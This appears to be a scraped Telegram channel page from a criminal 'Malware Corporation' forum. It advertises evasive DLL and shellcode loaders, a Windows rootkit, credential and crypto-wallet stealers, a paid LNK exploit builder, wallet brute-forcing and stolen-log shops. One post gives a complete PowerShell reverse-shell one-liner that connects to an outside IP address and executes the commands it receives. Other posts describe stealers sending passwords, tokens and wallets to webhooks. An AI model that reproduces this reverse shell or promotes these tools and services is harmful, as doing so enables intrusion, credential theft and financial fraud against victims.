Malware Corporation
Closed channel
Official Telegram group of Malware Corporation forum Link: @malwarecorp Clearnet: https://malwarecorp.com Donate: https://malwarecorp.ton Our channels: @MalwareLinks Chat: @MalwareForums Price: @MalwareAds admin@malwarecorp.com
Show more7 559
Subscribers
No data24 hours
+427 days
+9330 days
Posts Archive
7 559
AtomLdr: A DLL loader with evasive features
A DLL loader with advanced evasive
Features:
● CRT library independent.
● The final DLL file, can run the payload by loading the DLL (executing its entry point), or by executing the exported "Atom" function via the command line.
● DLL unhooking from \KnwonDlls\ directory, with no RWX sections.
● The encrypted payload is saved in the resource section and retrieved via custom code.
● AES256-CBC Payload encryption using custom no table/data-dependent branches using ctaes; this is one of the best custom AES implementations I've encountered.
● Aes Key & Iv Encryption.
● Indirect syscalls, utilizing HellHall with ROP gadgets (for the unhooking part).
● Payload injection using APC calls - alertable thread.
● Payload execution using APC - alertable thread.
● Api hashing using two different implementations of the CRC32 string hashing algorithm.
● The total Size is 17kb + payload size (multiple of 16).
https://github.com/NUL0x4C/AtomLdr
Private: @MalwareCloudBot
Магазин вредоносных ПО - @MalwareShopBot
Project @MalwareForum
#loader #dll
7 559
Брут Метамаска/Скупка запросов от команды Verif Team!
==========
Ищете лучшую систему брута криптокошельков? Заходите к нам!
@Verif213log_bot Лучший сервис по взлому криптокошельков!
У нас:
Депозит более 5.000.000 на всех популярных форумах.
Самая высокая статистика по вскрытым кошелькам!
Самая быстрая скорость обработки!
Процент 80-20
Подключенная неиросеть, которая ускоряет подбор пароля в десятки тысяч раз!
Подробно о работе брута читайте https://telegra.ph/Verif-log-bot-03-05-2
===========
Есть десятки тысяч логов? Обращайся в самый проверенный сервис по скупке запросов @Verif213log_bot
У нас:
Огромное кол-во отзывов на различных площадках!
Стабильные выплаты в течении 24 часов!
Гарантия оплаты в виде депозитов на сумму более 5.000.000 руб
Удобный самописный сортер для наших запросов!
7 559
✔️ Shop Bot 🤖 по логам с Google трафика, лучшего бота не встречал, советую всем! В наличии Gpay, FB spend, Amazon, Apple, Paypal, Ebay, Bookibg, BA!
На форуме exploit.in есть депозит в сумме 1000$
https://forum.exploit.in/topic/222834
Link: t.me/migrant_private_logs_bot
Link: t.me/migrant_private_logs_bot
Link: t.me/migrant_private_logs_bot
7 559
Chaos-Rootkit
x64 ring0 windows rootkit
Features:
Hide process: This feature allows you to hide processes from listing tools via DKOM.
Elevate specific process privileges : This feature enables you to elevate specific processes privilege .
Spawn elevated process: launch command prompt with elevated privileges .
SSDT hook (soon)
TCP & UDP connections (soon)
https://github.com/ZeroMemoryEx/Chaos-Rootkit
Private: @MalwareCloudBot
Магазин вредоносных ПО - @MalwareShopBot
Project @MalwareForum
#rootkit #windows
7 559
PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно.
usage:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Private: @MalwareCloudBot
Магазин вредоносных ПО - @MalwareShopBot
Project @MalwareForum7 559
❗️@Trackers Provides You Daily Updates From Dark Side❗️
▪️Updates About Data Leaks, Ransomware & DDoS Attacks, Malwares, On Telegram
t.me/Trackers
t.me/Trackers
t.me/Trackers
7 559
Ребят принимаю донат
Средства на бирже binance заморозили
Спасибо всем заранее
BTC:
167PajouM1z65JxqjUbSGNiPaGQbmySqMX
USDT trc20:
TDMTvfdeLKE4vwKUpRfdyKh6Grm8KYWDcV
LTC:
LaCcD4DZh723rP1UenFy9aKYbpbGp8VJeJ7 559
SELLING:
.Lnk/.Url exploit Builder | Spoof ANY extension AND icon | FUD | Bypass Smartscreen | Decoys, UAC, Startup & MORE
❗️ Macros are dead, this is BY FAR the best method to deliver malicious code
📺Demo videos:
Url:
https://vimeo.com/775841964
Lnk:
https://vimeo.com/713481488
There are countless articles about this very tool online, here are the major ones:
-> https://www.bleepingcomputer.com/news/security/malicious-windows-lnk-attacks-made-easy-with-new-quantum-builder/
-> https://blog.cyble.com/2022/06/22/quantum-software-lnk-file-based-builders-growing-in-popularity/
Looking up "lnk quantum builder" is enough to see some more articles:
-> https://duckduckgo.com/?q=lnk+quantum+builder
Features:
❇️ Spoof ANY extension
❇️ 300+ different icons available
❇️ UAC Bypass
❇️ Bypass Windows Smartscreen, EV cverts are a thing of the past
❇️ Decoy (upon opening the .lnk your a file of your choosing will be opened on your victim's pc)
❇️ Multiple payloads per .lnk, even if one of your payloads is detected the rest will still run
❇️ FUD even if you spread your stub, every build is unique
❇️ Implementation of the dogwalk n-day exploit, https://vimeo.com/719424628 (Private license only)
❇️ Run your payload at startup or with a delay
❇️ Hide your payloads after executing them
❇️ Supported payload formats: .exe/.js/.vbs/.bat/.ps1/.msi/.jar
& MORE
💶 Prices:
[.Lnk]1 month > 389 EUR 2 months > 555 EUR 6 months > 1099 EUR Lifetime > 1700 EUR
[.Lnk Private]1 month > 800 EUR Lifetime > 2000 EUR
[.Url](Superior stub & no need for zips) Contact us for more info (there are a limited amount of stubs up for sale) Telegram > @QuantumBuilderSupport (https://t.me/QuantumBuilderSupport) This is the @ of a user, not a channel. Some scammers are trying to impersonate us so be careful.
7 559
#реклама
Stealer Store | Stealer Developers | Stealer Source Code | Private Stealers | News | Tutorials etc.
Link: t.me/StealerStore
Chat: t.me/StealerDevs
7 559
D1rkLrd
Shellcode Loader with Indirect Dynamic syscall Implementation , shellcode in MAC format, API resolving from PEB, Syscall calll and syscall instruction address resolving at run time
https://github.com/TheD1rkMtr/D1rkLrd
Private: @MalwareCloudBot
Магазин вредоносных ПО - @MalwareShopBot
Project @MalwareForum
#windows #shellcode
7 559
Repost from Rat Software | Remote Adminstration Tools
VENOM 1.0.17 - metasploit Shellcode generator/compiller
Framework Description:
The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( C# | python
| ruby | dll | msi | hta-psh | docm | apk | macho | elf | deb | mp4 | etc ) injects the shellcode
generated into one template (example: python) "the python funtion will execute the shellcode into
ram" and uses compilers like gcc (gnu cross compiler) or mingw32 or pyinstaller to build the
executable file. It also starts an handler to recive the remote connection (shell or meterpreter)
'venom' reproduces some of the technics used by Veil-Evasion.py, unicorn.py, powersploit.py, etc..
Archive password: @ratsoftware
💬 Rat Developers
Private: @RatSoftwareBot
Магазин вредоносных ПО - @MalwareShopBot
Project @MalwareForum
7 559
Repost from Stealer Store
Discord Stealer V1 (Webhook)
Functions:
Will be able to log into the victim's Discord account and distribute itself to the victim's contacts Can steal popular cold crypto wallets Will tell you details like address, mail, token, username, etc. Will steal the browser's passwords. Desktop screenshot
The stealer will send all logs to the webhook, supports an alternative webhook if the first one is banned. Builder Requirements:
net framework
💬 Stealer Developers
Private: @StealerStoreBot
Магазин вредоносных ПО - @MalwareShopBot
Project @MalwareForum
7 559
APC Loader Source code #C
Payload Loader With Evasion Features
Features:
no crt functions imported
indirect syscalls using HellHall
api hashing using CRC32 hashing algorithm
payload encryption using rc4 - payload is saved in .rsrc
Payload injection using APC calls - alertable thread
Payload execution using APC - alertable thread
Execution delation using MsgWaitForMultipleObjects - edit this
the total size is 8kb + the payload size
compatible with LLVM (clang-cl) Option
Archive password: @malwarecloud
💬 Malware Developers
Private: @MalwareCloudBot
Магазин вредоносных ПО - @MalwareShopBot
Project @MalwareForum
7 559
Offensive Rootkit Development
Private: @MalwareCloudBot
Магазин вредоносных ПО - @MalwareShopBot
Project @MalwareForum
7 559
Detect Me If You Can - Anti-Firmware Forensics
Private: @MalwareCloudBot
Магазин вредоносных ПО - @MalwareShopBot
Project @MalwareForum
7 559
💎 I'm Better Stealer
🇷🇺 RU;
Часть функционала:
1. Первый стиллер с автоматическим обновлением лога каждые 3 дня
2. 70+ ,браузеров, 65+ крипторасширений под любые браузеры
3. Мэйн сервер и билд полностью на C++
4. Частые большие обновления
5. Т.к частые обновления с чисткой - крипт не обязателен
6. Анти снг
7. Server-side расшифровка - все данные расшифровываются на сервере
8. Вес билда - 450-500кб
9. Стиллер полностью самописный и код не привязан к определенной версии Windows, что открывает возможность гибкой настройки софта
🇬🇧 ЕN;
Part of the functionality:
1. First stealer with automatic log update every 3 days
2. 70 browsers, 65 crypto extensions for any browsers
3. Main server and build entirely in C
4. Frequent big updates
5. Because frequent updates with cleaning - the crypt is not required
6. Anti sng
7. Server-side decryption - all data is decrypted on the server
8. Build weight - 450-500kb
9. Stiller is completely self-written and the code is not tied to a specific version of Windows, which opens up the possibility of flexible software settings
💬 Group: @ImBetterNews
💬 Coder: @ImBetter_Corp
💬 Support: @ImBetterSupport
✅ Bot for automatic subscription purchase: @ImBetterProj_bot
